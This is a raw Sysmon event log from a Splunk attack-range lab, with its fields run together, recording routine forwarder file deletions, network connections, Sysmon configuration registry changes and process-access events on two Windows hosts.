23542300x80000000000000001048898Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:19.309{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25E4CF62574BF692E46BF150DA3483C9,SHA256=ECD762CD5288E2914AF5E4A249DDE536FFC9A377DD6EA0840F0190D1F277C618,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:20.897{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B746A1CAD6FEE269B09E5731C4325039,SHA256=942D03A7BE0611344CE836D1A0156D855FE408F02CDD1A169CB5D8F0513AF81B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048899Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:20.324{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14819F5C1AFDE3FD40B0B4070048C012,SHA256=32642CF2D413998B80F2AF4E76FE22F7DEB076FABA622E01DAC611579051021C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:20.475{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:21.913{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5A9BC8732A5B5B5C6529648B8EECF5,SHA256=B0F0F88EA82F116BD94F92FBAFAD41C5EEF1D57DFAC114F3B1787D922B2888AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048900Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:21.341{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=232D646E7074713359604B03A519A895,SHA256=293A9D15101BF4DE691A8736C3115FBCB6E70311BEA844DB04A93AB8CB0F2A82,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:20.608{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57266-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000807535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:20.280{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57265-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:22.928{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D1715EEBED21D3D9156C8D48AEB7A75,SHA256=17A5706B2FD0BC8EC55DD0CA211705F53D4C36E58D13DE1B35A74349F61E1199,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001048923Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.572{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigHashSHA256=75358E8028A9D2A1CC1782C71200ED0E529269E98BDC3389937C592CA9D2EB8F 13241300x80000000000000001048922Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.572{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\ConfigFileC:\Program Files\ansible\AttackRangeSysmon.xml 16341600x80000000000000001048921Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local2021-07-12 07:52:22.572C:\Program Files\ansible\AttackRangeSysmon.xmlSHA256=75358E8028A9D2A1CC1782C71200ED0E529269E98BDC3389937C592CA9D2EB8F 13241300x80000000000000001048920Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.572{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\RulesBinary Data 13241300x80000000000000001048919Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookupBinary Data 13241300x80000000000000001048918Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocationBinary Data 13241300x80000000000000001048917Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithmDWORD (0x8000000e) 13241300x80000000000000001048916Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\OptionsDWORD (0x00000007) 12241200x80000000000000001048915Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Rules 12241200x80000000000000001048914Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\DnsLookup 12241200x80000000000000001048913Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\CheckRevocation 12241200x80000000000000001048912Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\HashingAlgorithm 12241200x80000000000000001048911Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteValue2021-07-12 07:52:22.547{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exeHKLM\System\CurrentControlSet\Services\SysmonDrv\Parameters\Options 23542300x80000000000000001048910Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.527{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=03C012F1D044BB547A3D7C73277F07AA,SHA256=7E8FD39DD5A96B786D76CE084388F0511C1F24AA91014F10E90B236A5ADD35D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048909Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-F49A-60EB-327D-00000000CF01}61886504C:\Windows\system32\conhost.exe{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048908Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048907Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048906Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048905Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048904Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048903Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.460{466BC892-F49A-60EB-317D-00000000CF01}95726844C:\Windows\system32\cmd.exe{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048902Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.431{466BC892-F4B6-60EB-347D-00000000CF01}9596C:\Program Files\ansible\sysmon\Sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-Sysmon64.exe -c "C:\Program Files\ansible\AttackRangeSysmon.xml"C:\Program Files\ansible\sysmon\ATTACKRANGE\Administrator{466BC892-F49A-60EB-D4CC-F90400000000}0x4f9ccd43HighMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x80000000000000001048901Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:22.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2AF8A6DE4616C11BA6B88697233446D,SHA256=CBF7DFA35719B0E6926EB9E261F58802696992B65EEB5848EDCC9C2AFCB427BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:23.960{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C23A19D42E6D97F5B9EB27E101BF3FB,SHA256=4D3CEDA8F9F9A36417B244FEB121E513FC074CF658EFE917A6EC042751367CDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:23.427{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50CFF4EC02B6203CB7198A0A22D4E307,SHA256=9E75E42E23106A254D05E1CB6221696996C713F8BA3C4F19F63D0B0C7104B461,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048926Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:23.427{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=411555881008278B63B297402CA8B899,SHA256=DA4054BE613CE14EFE76A0B0CF9115BE68111FC57AE402CF5E8AA818A3C75C03,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048925Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:23.380{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C0B85DAE509F7B48BAA0C59093CCF0,SHA256=3D55285F70A4C7F5A4BABE7B41A38A5D135B997E93C137B5C04D074E0E5829A3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048924Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:14.605{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51024-false10.0.1.12-8000- 23542300x80000000000000001048928Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:24.395{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B33CBBEFFC8AF5E16F2EF6022BB0DE7,SHA256=0325DF87E5C8858BE05F96168502A6693E462E996E39247591334847493EFE35,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4B8-60EB-7479-00000000D001}2332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807561Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:24.819{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 